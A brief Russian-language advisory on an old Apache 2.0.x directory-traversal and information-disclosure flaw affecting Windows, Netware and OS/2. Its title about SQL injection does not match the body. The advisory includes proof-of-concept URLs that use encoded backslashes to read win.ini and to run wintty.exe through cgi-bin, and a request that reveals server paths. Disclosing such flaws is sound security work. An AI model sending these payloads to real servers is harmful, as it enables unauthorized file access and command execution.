Xakep #305. Многошаговые SQL-инъекции
В apache 2.0.x для Win/Netware/OS2 обнаружена возможность обхода каталога и раскрытие информации.
1. Обход основного каталога:
В apache не фильтруется символ '\' = %5c, который может использоваться как разделитель пути
(Windows, Netware, OS2 и другие). Уязвимость позволяет просмотреть содержание произвольных файлов и может использоваться для выполнения произвольных команд, через /cgi-bin/.
Пример:
Просматривает win.ini:
http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e
%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
Запускает утилиту wintty:
http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELL
2. Раскрытие информации:
Некорректный запрос к несуществующему var файлу, раскроет некоторую информацию о Web сервере (физическое расположение, версия и т.п.). Пример:
На запрос
http://127.0.0.1/error/HTTP_NOT_FOUND.html.var
cервер ответит в частности следующее:
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var, type
| text/html, language de
| * C:/server/Apache Group/Apache2/error/ HTTP_NOT_FOUND.html.var, type text/html, language en
| * C:/server/Apache Group/Apache2/error/ HTTP_NOT_FOUND.html.var, type text/html, language es
| * C:/server/Apache Group/Apache2/error/ HTTP_NOT_FOUND.html.var , type text/html, language fr
Уязвимость обнаружена в 2.0.x до 2.0.39.
